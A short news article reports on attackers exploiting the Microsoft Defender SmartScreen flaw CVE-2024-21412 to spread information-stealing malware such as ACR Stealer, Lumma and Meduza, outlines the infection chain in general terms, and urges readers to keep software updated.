Attackers are exploiting a flaw in Microsoft Defender to spread information-stealing malware. Microsoft has fixed this bug, but not all users have the latest software.
Security experts warn of exploiting vulnerabilities in Microsoft Defender SmartScreen to spread information-stealing malware. The vulnerability, identified as CVE-2024-21412, allows attackers to bypass protections and deliver malicious software such as ACR Stealer, Lumma, and Meduza. Even though Microsoft fixed the bug with the February 2024 update, attackers are still using non-updated systems.
Fortinet FortiGuard Labs has uncovered a campaign that spreads malicious files capable of bypassing SmartScreen and downloading malware to target computers. The campaign involves downloading and opening LNK files, which then download executable files containing the HTML Application script. This script decodes and executes PowerShell code that downloads a PDF that deploys the malware.
The malware steals information from a variety of applications, including web browsers, cryptocurrency wallets, messaging apps, FTP and email clients, VPN services, and password managers. ACR Stealer targets a wide range of apps, including Google Chrome, Microsoft Edge, Telegram, Signal, NordVPN, and password managers like Bitwarden and 1Password.
Security analyst Cara Lin warns that attackers lure victims into clicking on crafted links that download LNK files. These files then execute PowerShell code and malware that transmits the stolen information through the Steam community. Even though the data from the password manager should be encrypted, there is still a risk of its misuse. Computers in the Czech Republic should not be at risk, this problem primarily affects the USA, Spain and Thailand. Still, you’d better always check that you have the latest software. This rule applies not only to Microsoft Defender.
Source: pctuning.cz
